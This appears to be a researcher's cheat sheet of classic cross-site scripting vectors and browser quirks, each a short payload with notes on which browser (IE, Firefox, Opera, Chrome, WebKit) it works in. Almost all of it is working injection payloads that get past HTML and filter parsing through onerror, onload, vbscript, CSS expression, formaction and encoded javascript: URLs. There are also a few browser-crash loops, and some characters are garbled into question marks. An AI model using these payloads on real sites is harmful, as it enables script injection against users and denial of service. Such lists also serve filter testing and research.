A Collection of Classic XSS (Cross-Site Scripting) Vectors

<!-- " --!><input value="><img src=xx:x onerror=alert(1)//">

<script/onload=alert(1)></script> IE9

<style/onload=alert(1)>

alert([0x0D]-->[0x0D]1<!--[0x0D])

1<!--i

document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8

JSON.parse('{"__proto__":["a",1]}')

location++

IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)

alert('aaa\0bbb') IE only shows aaa http://jsbin.com/emekog

<svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera

Function('alert(arguments.callee.caller)')()

firefox dos? while(1)find();

<div/style=x:expression(alert(URL=1))>

Injecting <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enables CSS expressions, breaking standards mode!

<applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute FF!

<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector

<svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~

<body/onload=\\\vbs\\\::::::::alert+'x'+[000000]+'o'+'x'+[000000]::::::::>

vbs:alert+-[]

<body/onload=vbs::::::::alert----+--+----1:::::::::>

Firefox vector <math><a xlink:href="//mmme.me">click

<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>

Inj>> <script/src=//0.gg/xxxxx> << <script>...</script> less xss

Webkit X-XSS-Protection header is enabled just now :P

<svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/

<?xml encoding="><svg/onload=alert(1)// >">

<a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IE

Also <a `="<img/onerror=alert(1) src=xx:xx>'></h1>">x</a>

<h1 "='<img/onerror=alert(1) src=xx:xx>'></h1> IE only

<1h name="<svg/onload=alert(1)>"></1h>

<img ="1 src=xxx:x onerror=alert(1)//" > works in not-IE

javascript=1;for(javascript in RuntimeObject());javascript=='javascript'

<body/onerror=alert(event)><img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sandbox object

<img src='javascript:while([{}]);'> works in firefox

for(x in document.open); Crash your IE 6:>

localStorage.setItem('setItem',1)

Only to find '?'.toUpperCase()==='?'.toUpperCase()

J? H? T? W? Y? i? length==2

'?'.toUpperCase()=='I'

Also '?'.toUpperCase()=='SS'

'?'.toUpperCase()=='FF' // alike: ? FI ? FL ? FFI ? FFL ? ST ? ST

#Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>>

Firefox always the most cute data:_,<script>alert(1)</script>

<a href="ftp:/baidu.com">xx</a>

http://?????????? works in Firefox

RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?

location='&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'

for({} in {});

Interesting: http://jsbin.com/inekab for Opera only

<a href=https:http://www.google.com>x</a> That's a relative path?

document.frames==window.frames

<a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox

(0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode :D

127.0x000000001==127.0.0.1

<input value="&#31sefewfewf"/> Chrome input value block

<svg><xmp><img/onerror=alert(1) src=xxx:x />

<img src/="><img src=xxx:x onerror=alert(1)//">

An interesting use of isindex: <isindex formaction=javascript:alert(1) type=submit >

chrome:xx - >chrome://crash/ crash?

<form action=javascript:alert(1) /><input> Chrome input enter fucked!

<form/><button/><keygen/> Chrome sends an empty key, which is funny ~_~

<form/><input/formaction=javascript:alert(1)> Because <form> is not a void element.

<form><input/name="isindex"> When the name is isindex, the key is not sent.

<form id=x ></form><button form=x formaction="javascript:alert(1)">X It is like http://html5sec.org/#1 but only Chrome supports it.

<script language="php">echo 1 ?> Fascinating.

fvck:for(_?in?this)_['match'](/.Element$/)&&console.log(_)

location.reload('javascript:alert(1)') //ie only,lol~

{}alert(1)

Twitter @jackmasa =P
